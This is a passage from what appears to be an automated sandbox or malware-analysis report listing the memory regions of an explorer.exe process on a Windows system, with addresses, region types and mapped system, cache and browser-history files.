[0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1523 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1524 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1525 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1526 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1527 start_va = 0x50000 end_va = 0x55fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 1528 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1529 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1530 start_va = 0x80000 end_va = 0x8cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1531 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 1532 start_va = 0xa0000 end_va = 0xa1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 1533 start_va = 0xb0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1534 start_va = 0x130000 end_va = 0x196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1535 start_va = 0x1a0000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1536 start_va = 0x2a0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1537 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1538 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1539 start_va = 0x300000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1540 start_va = 0x400000 end_va = 0x587fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1541 start_va = 0x590000 end_va = 0x710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1542 start_va = 0x720000 end_va = 0x1b1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 1543 start_va = 0x1b20000 end_va = 0x1bfefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b20000" filename = "" Region: id = 1544 start_va = 0x1c00000 end_va = 0x1c01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1545 start_va = 0x1c10000 end_va = 0x1c29fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 1546 start_va = 0x1c30000 end_va = 0x1c30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 1547 start_va = 0x1c40000 end_va = 0x1c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 1548 start_va = 0x1c50000 end_va = 0x1c61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 1549 start_va = 0x1c70000 end_va = 0x1c72fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 1550 start_va = 0x1c80000 end_va = 0x1c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 1551 start_va = 0x1c90000 end_va = 0x1c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 1552 start_va = 0x1ca0000 end_va = 0x1ca1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 1553 start_va = 0x1cb0000 end_va = 0x1cb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cb0000" filename = "" Region: id = 1554 start_va = 0x1cc0000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 1555 start_va = 0x1d40000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1556 start_va = 0x1da0000 end_va = 0x1da1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001da0000" filename = "" Region: id = 1557 start_va = 0x1db0000 end_va = 0x1db2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui") Region: id = 1558 start_va = 0x1dc0000 end_va = 0x1dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 1559 start_va = 0x1dd0000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 1560 start_va = 0x1e50000 end_va = 0x211efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1561 start_va = 0x2120000 end_va = 0x217bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 1562 start_va = 0x2180000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1563 start_va = 0x2200000 end_va = 0x2205fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1564 start_va = 0x2210000 end_va = 0x2210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 1565 start_va = 0x2220000 end_va = 0x229dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 1566 start_va = 0x22a0000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 1567 start_va = 0x23a0000 end_va = 0x23e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1568 start_va = 0x23f0000 end_va = 0x23f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 1569 start_va = 0x2410000 end_va = 0x2411fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 1570 start_va = 0x2420000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 1571 start_va = 0x2520000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1572 start_va = 0x2620000 end_va = 0x271ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1573 start_va = 0x2720000 end_va = 0x2728fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 1574 start_va = 0x2730000 end_va = 0x2733fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 1575 start_va = 0x2740000 end_va = 0x2756fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 1576 start_va = 0x2760000 end_va = 0x2760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002760000" filename = "" Region: id = 1577 start_va = 0x2770000 end_va = 0x27effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 1578 start_va = 0x27f0000 end_va = 0x27f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 1579 start_va = 0x2800000 end_va = 0x2800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 1580 start_va = 0x2810000 end_va = 0x281efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 1581 start_va = 0x2820000 end_va = 0x2821fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 1582 start_va = 0x2830000 end_va = 0x2830fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 1583 start_va = 0x2840000 end_va = 0x2844fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 1584 start_va = 0x2850000 end_va = 0x2853fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 1585 start_va = 0x2870000 end_va = 0x2873fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1586 start_va = 0x2880000 end_va = 0x28affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 1587 start_va = 0x28b0000 end_va = 0x28b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1588 start_va = 0x28c0000 end_va = 0x28c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename = "" Region: id = 1589 start_va = 0x28d0000 end_va = 0x28d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 1590 start_va = 0x28f0000 end_va = 0x28f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 1591 start_va = 0x2900000 end_va = 0x2901fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 1592 start_va = 0x2910000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 1593 start_va = 0x29a0000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 1594 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 1595 start_va = 0x2a40000 end_va = 0x2abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 1596 start_va = 0x2ac0000 end_va = 0x2b25fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1597 start_va = 0x2b30000 end_va = 0x2b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 1598 start_va = 0x2b40000 end_va = 0x2b40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 1599 start_va = 0x2b50000 end_va = 0x2b50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 1600 start_va = 0x2b60000 end_va = 0x2b60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 1601 start_va = 0x2b70000 end_va = 0x2beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 1602 start_va = 0x2bf0000 end_va = 0x351ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1603 start_va = 0x3520000 end_va = 0x3520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003520000" filename = "" Region: id = 1604 start_va = 0x3530000 end_va = 0x3530fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 1605 start_va = 0x3540000 end_va = 0x3540fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 1606 start_va = 0x3550000 end_va = 0x3551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003550000" filename = "" Region: id = 1607 start_va = 0x3560000 end_va = 0x3566fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "authui.dll.mui" filename = "\\Windows\\System32\\en-US\\authui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\authui.dll.mui") Region: id = 1608 start_va = 0x3570000 end_va = 0x357dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1609 start_va = 0x3580000 end_va = 0x3580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 1610 start_va = 0x3590000 end_va = 0x3590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 1611 start_va = 0x35a0000 end_va = 0x361ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 1612 start_va = 0x3620000 end_va = 0x3621fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003620000" filename = "" Region: id = 1613 start_va = 0x3630000 end_va = 0x3631fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003630000" filename = "" Region: id = 1614 start_va = 0x3640000 end_va = 0x3643fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1615 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 1616 start_va = 0x3660000 end_va = 0x3660fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 1617 start_va = 0x3670000 end_va = 0x3671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003670000" filename = "" Region: id = 1618 start_va = 0x3680000 end_va = 0x3681fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003680000" filename = "" Region: id = 1619 start_va = 0x3690000 end_va = 0x3693fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1620 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 1621 start_va = 0x36b0000 end_va = 0x36b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1622 start_va = 0x36c0000 end_va = 0x36c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{228385D3-B646-481B-B0DE-F0C3A58F5423}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db") Region: id = 1623 start_va = 0x36d0000 end_va = 0x36d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1624 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{87178F01-581A-45F0-9991-3F918FAA83F1}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db") Region: id = 1625 start_va = 0x36f0000 end_va = 0x36f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1626 start_va = 0x3700000 end_va = 0x3701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003700000" filename = "" Region: id = 1627 start_va = 0x3710000 end_va = 0x3720fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netshell.dll.mui" filename = "\\Windows\\System32\\en-US\\netshell.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netshell.dll.mui") Region: id = 1628 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 1629 start_va = 0x3740000 end_va = 0x3740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1630 start_va = 0x3750000 end_va = 0x3750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003750000" filename = "" Region: id = 1631 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 1632 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 1633 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{C353F91E-D25F-48F0-A2CD-9F60B2681E9A}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db") Region: id = 1634 start_va = 0x3790000 end_va = 0x3793fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1635 start_va = 0x37a0000 end_va = 0x37a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{2F368D22-02BF-4413-97D1-C886CB140911}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db") Region: id = 1636 start_va = 0x37b0000 end_va = 0x37bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012021092020210927\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012021092020210927\\index.dat") Region: id = 1637 start_va = 0x37c0000 end_va = 0x37c7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012021092820210929\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012021092820210929\\index.dat") Region: id = 1638 start_va = 0x3810000 end_va = 0x3810fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003810000" filename = "" Region: id = 1639 start_va = 0x3820000 end_va = 0x3820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 1640 start_va = 0x3830000 end_va = 0x3830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 1641 start_va = 0x3840000 end_va = 0x3840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 1642 start_va = 0x3890000 end_va = 0x3890fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alttab.dll.mui" filename = "\\Windows\\System32\\en-US\\AltTab.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\alttab.dll.mui") Region: id = 1643 start_va = 0x38a0000 end_va = 0x391ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 1644 start_va = 0x3920000 end_va = 0x3921fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003920000" filename = "" Region: id = 1645 start_va = 0x3930000 end_va = 0x3934fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 1646 start_va = 0x3940000 end_va = 0x3940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003940000" filename = "" Region: id = 1647 start_va = 0x3950000 end_va = 0x3951fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1648 start_va = 0x3970000 end_va = 0x3970fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003970000" filename = "" Region: id = 1649 start_va = 0x39d0000 end_va = 0x39d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1650 start_va = 0x39e0000 end_va = 0x39e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1651 start_va = 0x39f0000 end_va = 0x39f0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1652 start_va = 0x3a00000 end_va = 0x3a00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a00000" filename = "" Region: id = 1653 start_va = 0x3a10000 end_va = 0x3a10fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1654 start_va = 0x3a20000 end_va = 0x3a20fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1655 start_va = 0x3a30000 end_va = 0x3a30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1656 start_va = 0x3a50000 end_va = 0x3a50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a50000" filename = "" Region: id = 1657 start_va = 0x3a60000 end_va = 0x3a60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1658 start_va = 0x3a70000 end_va = 0x3a7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: 